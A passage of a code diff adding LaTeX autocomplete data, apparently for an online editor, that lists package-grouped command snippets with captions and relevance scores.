'ltxcmds-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltxcmds-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltxcmds-cmd', + score: 0.021170869458413965, + }, + ], + outlines: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'outlines-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'outlines-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'outlines-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'outlines-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'outlines-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'outlines-cmd', + score: 0.0018957469739775527, + }, + ], + typearea: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'typearea-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'typearea-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'typearea-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'typearea-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'typearea-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'typearea-cmd', + score: 0.00037306820619479756, + }, + ], + currfile: [ + { + caption: '\\currfiledir', + snippet: '\\currfiledir', + meta: 'currfile-cmd', + score: 0.0002459788020229296, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'currfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'currfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'currfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'currfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'currfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'currfile-cmd', + score: 0.021170869458413965, + }, + ], + toptesi: [ + { + caption: '\\tomo', + snippet: '\\tomo', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\mainmatter', + snippet: '\\mainmatter', + meta: 'toptesi-cmd', + score: 0.025705092792367497, + }, + { + caption: '\\ringraziamenti', + snippet: '\\ringraziamenti', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sommario', + snippet: '\\sommario', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NoteWhiteLine', + snippet: '\\NoteWhiteLine', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\paginavuota', + snippet: '\\paginavuota', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\nota{}', + snippet: '\\nota{$1}', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\indici', + snippet: '\\indici', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'toptesi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'toptesi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'toptesi-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'toptesi-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'toptesi-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'toptesi-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'toptesi-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'toptesi-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'toptesi-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'toptesi-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'toptesi-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'toptesi-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'toptesi-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'toptesi-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'toptesi-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'toptesi-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'toptesi-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'toptesi-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'toptesi-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'toptesi-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'toptesi-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'toptesi-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\listing{}', + snippet: '\\listing{$1}', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'toptesi-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\gradi', + snippet: '\\gradi', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'toptesi-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'toptesi-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ped{}', + snippet: '\\ped{$1}', + meta: 'toptesi-cmd', + score: 0.0007129548652040002, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'toptesi-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\gei', + snippet: '\\gei', + meta: 'toptesi-cmd', + score: 0.00023765162173466673, + }, + ], + amsrefs: [ + { + caption: '\\ndash', + snippet: '\\ndash', + meta: 'amsrefs-cmd', + score: 0.0003420867634658178, + }, + { + caption: '\\bib{}{}{}', + snippet: '\\bib{$1}{$2}{$3}', + meta: 'amsrefs-cmd', + score: 0.0017473230242849183, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'amsrefs-cmd', + score: 2.341195220791228, + }, + ], + sistyle: [ + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'sistyle-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'sistyle-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'sistyle-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'sistyle-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'sistyle-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'sistyle-cmd', + score: 0.0063276692758974925, + }, + ], + suffix: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'suffix-cmd', + score: 0.03789745970461662, + }, + ], + sansmath: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'sansmath-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'sansmath-cmd', + score: 0.021170869458413965, + }, + ], + 'tikz-qtree': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-qtree-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-qtree-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-qtree-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-qtree-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-qtree-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-qtree-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-qtree-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-qtree-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-qtree-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-qtree-cmd', + score: 0.2864294797053033, + }, + ], + floatpag: [ + { + caption: '\\rotfloatpagestyle{}', + snippet: '\\rotfloatpagestyle{$1}', + meta: 'floatpag-cmd', + score: 0.0004535003423927585, + }, + { + caption: '\\floatpagestyle{}', + snippet: '\\floatpagestyle{$1}', + meta: 'floatpag-cmd', + score: 0.0004535003423927585, + }, + ], + colortab: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'colortab-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'colortab-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'colortab-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'colortab-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'colortab-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'colortab-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'colortab-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'colortab-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'colortab-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'colortab-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'colortab-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'colortab-cmd', + score: 0.006520475264573554, + }, + ], + parcolumns: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'parcolumns-cmd', + score: 0.00037306820619479756, + }, + ], + dingbat: [ + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'dingbat-cmd', + score: 0.025060530944368123, + }, + ], + ifoddpage: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ifoddpage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\checkoddpage', + snippet: '\\checkoddpage', + meta: 'ifoddpage-cmd', + score: 0.00028672585452906425, + }, + ], + kvoptions: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'kvoptions-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'kvoptions-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'kvoptions-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'kvoptions-cmd', + score: 0.021170869458413965, + }, + ], + 'pst-tree': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-tree-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-tree-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-tree-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-tree-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-tree-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-tree-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-tree-cmd', + score: 0.006520475264573554, + }, + ], + nonfloat: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nonfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nonfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nonfloat-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nonfloat-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nonfloat-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nonfloat-cmd', + score: 0.0018957469739775527, + }, + ], + rsphrase: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rsphrase-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rsphrase-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'rsphrase-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rsphrase-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rsphrase-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rsphrase-cmd', + score: 0.0018957469739775527, + }, + ], + beramono: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'beramono-cmd', + score: 0.00037306820619479756, + }, + ], + pgfbaseimage: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfbaseimage-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfbaseimage-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfbaseimage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfbaseimage-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfbaseimage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.2864294797053033, + }, + ], + romannum: [ + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'romannum-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'romannum-cmd', + score: 0.007676927812687567, + }, + ], + tgtermes: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgtermes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: 